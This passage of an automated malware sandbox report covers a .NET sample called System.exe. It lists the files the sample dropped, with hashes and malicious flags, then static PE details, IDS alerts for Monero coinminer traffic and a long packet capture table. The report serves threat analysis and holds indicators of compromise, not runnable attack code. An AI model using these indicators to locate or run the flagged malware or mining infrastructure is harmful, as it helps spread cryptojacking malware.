                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                    Malicious:false
                                                    Preview:@...e...........................................................

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10vheoqr.b4o.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hv2qyiyk.cqc.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ovq55wy1.bsc.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p5ai5zem.hdq.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\tmpC764.tmp.dat

                                                    Download File
                                                    Process:C:\Users\user\Desktop\System.exe
                                                    File Type:SQLite 3.x database, user version 57, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 2, database pages 41, cookie 0x21, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):5242880
                                                    Entropy (8bit):0.035631294721445904
                                                    Encrypted:false
                                                    SSDEEP:192:bZjnkYjcoBMcygNDI7oslTYBIQg6Ism2Vspvp0:bZTVTBMcygNDuT1l62p
                                                    MD5:59E4A8110FA2BCC012E341B93E96E93D
                                                    SHA1:EE08810B0CE857F01170C08A24B9D438B64D577D
                                                    SHA-256:3A85F2FC349A7E431EA6F1FC4568C99C1918D478AD6FE6445D560EF00395DB40
                                                    SHA-512:2AD00B0FCBE4FC37ECAA68C16BE32A904D682A23ACF5B39BCECF5DC280E23933FDD5A0D2A92A45F2C77618CA7466334AFEB1EAA7EA07BF4E043282B31039E8FF
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......)...........!...................9..................................S`....(e......}$|.|N{.{sz.z{z.yAx.x!w.v.wZu7tNt.s.s\r.rJq.p.q.p.o.o.o.m.mal&k.k.g.g3f.f.e.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\System.exe
                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):2660352
                                                    Entropy (8bit):6.547190613352591
                                                    Encrypted:false
                                                    SSDEEP:49152:0oHeAmEkEH3Kp1uSm2kQqKbo7Oep/IOOQNMXNvsW0RWlves17n:THeAmEenbGOep/ra9TaWlve8b
                                                    MD5:B0601C9443DD3B7A6B02EE764791C9AD
                                                    SHA1:8ED01F29022CE752408BAE7FF961EDC06872413A
                                                    SHA-256:52C8C92F79183A354C5EE59653426B0F97209C37EEC39FE5077EF43666EAF8A1
                                                    SHA-512:130DAC47EB656F37F0A0DF20C193768590788279E785FDA9D7A92717CECAAE9CB57C4A4740060265E83154C9D853BB952DA1A2AF0D1A9FB355B1DA0AAA8B9A9C
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                    • Antivirus: Virustotal, Detection: 81%, Browse
                                                    Joe Sandbox View:
                                                    • Filename: Sj6RXNl1qf.exe, Detection: malicious, Browse
                                                    • Filename: Sj6RXNl1qf.exe, Detection: malicious, Browse
                                                    • Filename: Bypasss.exe, Detection: malicious, Browse
                                                    • Filename: Bypasss.exe, Detection: malicious, Browse
                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Cf.........."...........(.....@..........@..............................)...........`....................................................<.....(.0.....(...............).x...............................(.......8...............X............................text...v........................... ..`.rdata..< ......."..................@..@.data.....'.......'.................@....pdata........(.......(.............@..@.00cfg........(.......(.............@..@.tls..........(.......(.............@....rsrc...0.....(.......(.............@..@.reloc..x.....).......(.............@..B........................................................................................................................................................................................................................................................................................................

                                                    C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):64
                                                    Entropy (8bit):0.34726597513537405
                                                    Encrypted:false
                                                    SSDEEP:3:Nlll:Nll
                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                    Malicious:false
                                                    Preview:@...e...........................................................

                                                    C:\Windows\Temp\__PSScriptPolicyTest_0zkvhox5.3hg.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Windows\Temp\__PSScriptPolicyTest_h22llecf.bmj.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Windows\Temp\__PSScriptPolicyTest_kdriptlu.z2g.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Windows\Temp\__PSScriptPolicyTest_xs14qauc.elb.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Windows\Temp\ubgiupusihqd.sys

                                                    Download File
                                                    Process:C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe
                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):14544
                                                    Entropy (8bit):6.2660301556221185
                                                    Encrypted:false
                                                    SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                    MD5:0C0195C48B6B8582FA6F6373032118DA
                                                    SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                    SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                    SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                    • Antivirus: Virustotal, Detection: 4%, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):5.583745002176279
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:System.exe
                                                    File size:294'400 bytes
                                                    MD5:043c5d0495cd21a75fdf7a2ab4ae0d2c
                                                    SHA1:8b63a7b39c56368cd4ee15b343141dd0b5c5fdc9
                                                    SHA256:b231b582f0d9cf452ff24d38b33ab6cff59ce035275653cc79526e832d0f5849
                                                    SHA512:26fbd0d630e37f521f86c12c8ad8a83410a6d84aeb39964ac51152d62b24e6d6706a73df37c0e514bd7aa7315b40bab74810f2150981bde92fe3862208479431
                                                    SSDEEP:6144:OuorQXpuqyUMjBh7jh0zSDCb5zghdLZSmPBc:WA2hjRqMhdL
                                                    TLSH:B7541A2BBBE54808E0ED8AFE599E5B63C758D0127905B753B34362A26D01BFCED0B0D5
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C............"...0..t............... ........@.. ....................................`................................

                                                    File Icon

                                                    Icon Hash:90cececece8e8eb0

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4492ae
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x9AEB43BA [Sun May 12 06:52:42 2052 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x492540x57.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x5ae.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4c0000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000x472b40x47400c95f16ce8249a22a35168f95163db69dFalse0.4583675986842105DIY-Thermocam raw data (Lepton 2.x), scale 28714-0, spot sensor temperature 0.000000, unit celsius, color scheme 6, minimum point enabled, maximum point enabled, calibration: offset 2872020891142082237765968199680.000000, slope 158758122025715908473404784640.0000005.597151499320231IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc0x4a0000x5ae0x600a3f9f56adce17e88c3a847a4ca4076e0False0.4244791666666667data4.076660061998121IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x4c0000xc0x200bca37409714b896e181bb407e804da5bFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_VERSION0x4a0a00x324data0.43407960199004975
                                                    RT_MANIFEST0x4a3c40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-09-17T03:59:46.294107+02002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.11.2049760142.202.242.43443TCP
                                                    2024-09-17T03:59:57.809842+02002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.11.20499891.1.1.153UDP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 17, 2024 03:59:46.025365114 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.025392056 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.025603056 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.033751011 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.033761978 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.253470898 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.253855944 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.257694960 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.257716894 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.258058071 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.293977022 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.336242914 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.452541113 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.452665091 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.452881098 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.452910900 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.459196091 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.460105896 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.460130930 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.466643095 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.466928005 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.466953039 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.474050045 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.474400043 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.474425077 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.480756044 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.480921984 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.480947018 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.487660885 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.487833023 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.487842083 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.501405001 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.501693964 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.501704931 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.545298100 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.552584887 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.556576014 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.556646109 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.556773901 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.556790113 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.557071924 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.563544989 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.569998026 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.570056915 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.570178032 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.570188046 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.570436954 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.576953888 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.584084988 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.584242105 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.584254026 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.591263056 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.591445923 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.591459990 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.597870111 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.598100901 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.598114967 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.604427099 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.604652882 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.604664087 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.611474991 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.611659050 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.611669064 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.624119043 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.624165058 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.624355078 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.624365091 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.624526024 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.630788088 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.637304068 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.637358904 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.637526989 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.637537956 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.637711048 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.644332886 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.650825024 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.651010990 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.651021957 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.651153088 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.661658049 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.661906958 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.668790102 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.669025898 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.673219919 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:46.673569918 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:46.680557013 CEST44349759191.101.104.168192.168.11.20
